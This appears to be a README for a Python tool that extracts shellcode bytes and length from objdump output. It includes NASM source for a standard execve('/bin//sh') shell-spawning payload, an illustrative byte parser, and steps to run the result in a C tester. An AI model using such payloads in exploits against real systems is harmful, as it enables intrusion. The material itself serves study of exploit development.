
Python script to extract shellcode from object/executable files

A simple tool developed for study and research purposes; I hope it will be useful.
The goal is to extract the shellcode and its length from an object/binary file.

Update 2022

  • The script is for Python 3
  • There is a shellcode tester for macOS


Write assembly code, produce an object file, and then use this script in a pipeline with objdump.


The example is on Linux, but shellcode-extractor works on macOS too.
Let's write shell-spawning assembly code in spawnshell.asm (NASM):

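	xor eax, eax		; eax = 0
	push eax		; NUL terminator for the path string
	push 0x68732f2f		; "//sh"
	push 0x6e69622f		; "/bin"
	mov ebx, esp		; ebx = pointer to "/bin//sh"
	push eax		; NULL
	mov edx, esp		; edx = envp (pointer to NULL)
	push ebx		; pointer to the path
	mov ecx, esp		; ecx = argv = { path, NULL }
	mov al, 11		; syscall number 11 = execve
	int 0x80		; invoke the syscall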

Assemble it:

nobody@nobody:~$ nasm -f elf spawnshell.asm -o output.o

Now we can use our script:

nobody@nobody:~$ objdump -d output.o | python shellcode_extractor.py
Lenght: 25
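
How an `objdump -d` listing reduces to opcode bytes and a length, as an added example (this is not the code of shellcode_extractor.py). The sample disassembly is constructed for the listing above, and the names `extract_bytes` and `to_c_string` are hypothetical.

```python
import re

# Constructed sample of `objdump -d output.o` output for the listing above.
# objdump prints AT&T syntax by default; the three fields are tab-separated.
SAMPLE = (
    "\noutput.o:     file format elf32-i386\n\n"
    "Disassembly of section .text:\n\n"
    "00000000 <.text>:\n"
    "   0:\t31 c0                \txor    %eax,%eax\n"
    "   2:\t50                   \tpush   %eax\n"
    "   3:\t68 2f 2f 73 68       \tpush   $0x68732f2f\n"
    "   8:\t68 2f 62 69 6e       \tpush   $0x6e69622f\n"
    "   d:\t89 e3                \tmov    %esp,%ebx\n"
    "   f:\t50                   \tpush   %eax\n"
    "  10:\t89 e2                \tmov    %esp,%edx\n"
    "  12:\t53                   \tpush   %ebx\n"
    "  13:\t89 e1                \tmov    %esp,%ecx\n"
    "  15:\tb0 0b                \tmov    $0xb,%al\n"
    "  17:\tcd 80                \tint    $0x80\n"
)

OFFSET = re.compile(r"\s*[0-9a-f]+:")                # "   3:" address column
HEXRUN = re.compile(r"[0-9a-f]{2}(?: [0-9a-f]{2})*")  # "68 2f 2f 73 68"


def extract_bytes(disassembly: str) -> bytes:
    """Collect the opcode bytes from every instruction line."""
    out = bytearray()
    for line in disassembly.splitlines():
        fields = line.split("\t")
        # Headers and "<label>:" lines have no tab-separated byte column.
        if len(fields) < 2 or not OFFSET.fullmatch(fields[0]):
            continue
        run = fields[1].strip()
        # Continuation lines of long instructions carry bytes but no mnemonic.
        if HEXRUN.fullmatch(run):
            out += bytes.fromhex(run)
    return bytes(out)


def to_c_string(data: bytes) -> str:
    """Render bytes as \\xNN escapes for a C string literal."""
    return "".join(f"\\x{b:02x}" for b in data)


if __name__ == "__main__":
    code = extract_bytes(SAMPLE)
    print(to_c_string(code))
    print("Length:", len(code))
```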


Insert our shellcode into the empty string in shellcode_tester.c or shellcode_tester_macos.c, compile it with gcc and run it (remember: on macOS, gcc is an alias for clang).

